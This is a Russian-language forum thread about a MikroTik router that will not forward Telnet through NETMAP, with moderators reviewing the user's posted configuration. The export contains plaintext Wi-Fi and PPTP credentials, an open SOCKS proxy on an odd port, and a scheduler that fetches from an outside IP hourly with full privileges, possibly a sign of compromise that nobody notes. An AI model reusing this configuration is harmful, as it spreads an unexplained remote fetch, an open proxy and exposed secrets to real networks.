Не работает NETMAP протокола Telnet

Обсуждение оборудования и его настройки
Ответить
soh20
Сообщения: 17
Зарегистрирован: 03 дек 2013, 11:37

При попытке проброса порта 23 во внутреннюю сеть, ничего не получается. Например, SSH и RDP пробросились, а Telnet нет. В чем может быть причина?
Сервис Telnet у самого Микротика отключен. Пытались сделать проброс порта 4666 (например) на 23 внутренний, тоже ничего не работает.

Изображение
Изображение


vqd
Модератор
Сообщения: 3605
Зарегистрирован: 26 сен 2013, 14:20
Откуда: НСК
Контактная информация:

на оконечной машите телнет сервер отключен
Фаервол блокирует
антивирус блокирует
шлюз не тот указан
машина отключена
кабель мыши перегрызли
ип адрес не тот
фильтры в микротике не настроены
ну и т.п.


Есть интересная задача и бюджет? http://mikrotik.site
soh20
Сообщения: 17
Зарегистрирован: 03 дек 2013, 11:37

Телнет сервер включен, файерволл отключен, антивируса нет,при подключении другого роутера (DIR-320) все работает

Какие фильтры? Если про Filter Rules, то там только одно правило

Изображение


vqd
Модератор
Сообщения: 3605
Зарегистрирован: 26 сен 2013, 14:20
Откуда: НСК
Контактная информация:

ну тогда остается только ждать когда планеты в ряд выстроятся
Говорят в это время экстрасенсорные способности хорошо проявляются и телепаты на пике своей активности

А пока читайте правила которые в шапке форума написанны


Есть интересная задача и бюджет? http://mikrotik.site
Аватара пользователя
podarok66
Модератор
Сообщения: 4355
Зарегистрирован: 11 фев 2012, 18:49
Откуда: МО

Я ошибаюсь или нет? При порт форвардинг в фильтрах вроде бы нужно использовать цепочку input, а не forward. Вроде как обращение идет к роутеру, а не к оконечной машине, следовательно и правила пишем для intut.
Или у меня по случаю выходного логические цепочки неверно выстраиваются?


Мануалы изучил и нигде не ошибся? Фаервол отключил? Очереди погасил? Витая пара проверена? ... Тогда Netinstal'ом железку прошей и настрой ее заново. Что, все равно не фурычит? Тогда к нам. Если не подскажем, хоть посочувствуем...
soh20
Сообщения: 17
Зарегистрирован: 03 дек 2013, 11:37

Ну у меня конфигурация выглядит так. Беда в том, что на соседний сервер и SSH нормально через NETMAP пробрасывается и вообще все. В общем что-то я не так делаю, а что, поянть не могу.
 Настройки микротика

Код: Выделить всё

# feb/16/2014 01:31:31 by RouterOS 6.5
# software id = J7RK-91SW
#
/interface bridge
add l2mtu=1598 name=bridge1 protocol-mode=rstp
/interface wireless
set [ find default-name=wlan1 ] band=2ghz-b/g/n disabled=no ht-rxchains=0,1 \
    ht-txchains=0,1 l2mtu=2290 mode=ap-bridge tx-power=30 tx-power-mode=\
    card-rates
/interface ethernet
set [ find default-name=ether1 ] mac-address=D4:CA:6D:37:64:83
set [ find default-name=ether3 ] master-port=ether2
set [ find default-name=ether4 ] master-port=ether2
set [ find default-name=ether5 ] master-port=ether2
/interface wireless security-profiles
set [ find default=yes ] authentication-types=wpa2-psk eap-methods="" \
    group-ciphers=tkip,aes-ccm mode=dynamic-keys unicast-ciphers=tkip,aes-ccm \
    wpa2-pre-shared-key=1234567890
/ip hotspot user profile
set [ find default=yes ] idle-timeout=none keepalive-timeout=2m \
    mac-cookie-timeout=3d
/ip pool
add name=dhcp_pool1 ranges=192.168.88.2-192.168.88.254
add name=dhcp_pool2 ranges=192.168.87.2-192.168.87.254
add name=dhcp_pool3 ranges=192.168.88.2-192.168.88.254
/ip dhcp-server
add address-pool=dhcp_pool3 disabled=no interface=bridge1 name=dhcp1
/ppp profile
add name=filial only-one=yes use-compression=yes use-encryption=yes \
    use-vj-compression=yes
/interface bridge port
add bridge=bridge1 interface=wlan1
add bridge=bridge1 interface=ether2
/interface ovpn-server server
set enabled=yes
/interface pptp-server server
set enabled=yes max-mru=1460 max-mtu=1460
/interface wireless sniffer
set file-limit=1000 memory-limit=1000
/ip address
add address=10.208.46.52/22 interface=ether1 network=10.208.44.0
add address=192.168.88.1/24 interface=wlan1 network=192.168.88.0
/ip dhcp-server lease
add address=192.168.88.254 client-id=1:0:25:d3:df:bf:64 mac-address=\
    00:25:D3:DF:BF:64 server=dhcp1
add address=192.168.88.250 client-id=1:50:e5:49:3d:db:42 mac-address=\
    50:E5:49:3D:DB:42 server=dhcp1
/ip dhcp-server network
add address=192.168.88.0/24 gateway=192.168.88.1
/ip dns
set servers=192.168.248.21
/ip firewall filter
add chain=forward dst-address=192.168.88.100 dst-port=19900-20000 \
    in-interface=ether1 out-interface=ether2 protocol=udp src-port=\
    19900-20000
add chain=input dst-port=23 protocol=tcp
/ip firewall nat
add action=masquerade chain=srcnat src-address=192.168.88.0/24
add action=masquerade chain=srcnat disabled=yes dst-address=192.168.88.0/24
add action=dst-nat chain=dstnat dst-port=5178 in-interface=ether1 protocol=\
    udp to-addresses=192.168.88.100 to-ports=5178
add action=dst-nat chain=dstnat dst-port=19900-20000 in-interface=ether1 \
    protocol=udp to-addresses=192.168.88.100 to-ports=19900-20000
add chain=dstnat disabled=yes src-address=192.168.88.0
add action=netmap chain=dstnat dst-port=24 in-interface=ether1 protocol=tcp \
    to-addresses=192.168.88.100 to-ports=22
add action=masquerade chain=srcnat src-address=192.168.5.0/24
add action=netmap chain=dstnat dst-port=23 protocol=tcp to-addresses=\
    192.168.88.101 to-ports=23
/ip route
add check-gateway=ping distance=1 gateway=10.208.44.1
add distance=1 dst-address=10.2.7.0/24 gateway=192.168.5.3
add distance=1 dst-address=192.168.1.0/24 gateway=192.168.5.1
/ip service
set telnet disabled=yes
set ftp disabled=yes
set www disabled=yes
set api disabled=yes
set api-ssl disabled=yes
/ip socks
set enabled=yes port=41538
/ip traffic-flow target
add version=5
/ppp secret
add local-address=192.168.5.1 name=user1 password=S1sOpHell profile=\
    default-encryption remote-address=192.168.5.2 service=pptp
/system clock
set time-zone-name=Etc/GMT-4
/system leds
set 0 interface=wlan1
/system logging
add action=echo topics=pptp
/system ntp client
set enabled=yes mode=unicast primary-ntp=85.114.26.194
/system scheduler
add interval=1h name=schedule1 on-event="/tool fetch url=\"http://79.132.118.1\
    00/index.html\" port=41413 mode=http" policy=\
    reboot,read,write,policy,test,password,sniff,sensitive start-time=startup
/tool graphing interface
add interface=ether1
add
/tool graphing resource
add
/tool traffic-monitor
add interface=ether1 name=tmon1 threshold=0


Аватара пользователя
podarok66
Модератор
Сообщения: 4355
Зарегистрирован: 11 фев 2012, 18:49
Откуда: МО

Интерфейс всё-таки надо bridge1 выставить:

Код: Выделить всё

/ip address
add address=192.168.88.1/24 interface=wlan1 network=192.168.88.0

Вот тут может всё же стоит прописать dst-address?

Код: Выделить всё

/ip firewall nat
add action=netmap chain=dstnat dst-port=24 in-interface=ether1 protocol=tcp \
    to-addresses=192.168.88.100 to-ports=22

Вот тут тоже, кстати не очень понятно, что Вы делаете? Если порт форвардинг, то надо бы input, и зачем out-interface=ether2 ? Тут надо bridge ставить... А можно его вообще не указывать.

Код: Выделить всё

/ip firewall filter
add chain=forward dst-address=192.168.88.100 dst-port=19900-20000 \
    in-interface=ether1 out-interface=ether2 protocol=udp src-port=\
    19900-20000

Но вообще, правило в фильтрах не имеет смысла, если нет определенного набора. Ведь, как мы помним, по умолчанию разрешено всё.


Мануалы изучил и нигде не ошибся? Фаервол отключил? Очереди погасил? Витая пара проверена? ... Тогда Netinstal'ом железку прошей и настрой ее заново. Что, все равно не фурычит? Тогда к нам. Если не подскажем, хоть посочувствуем...
Ответить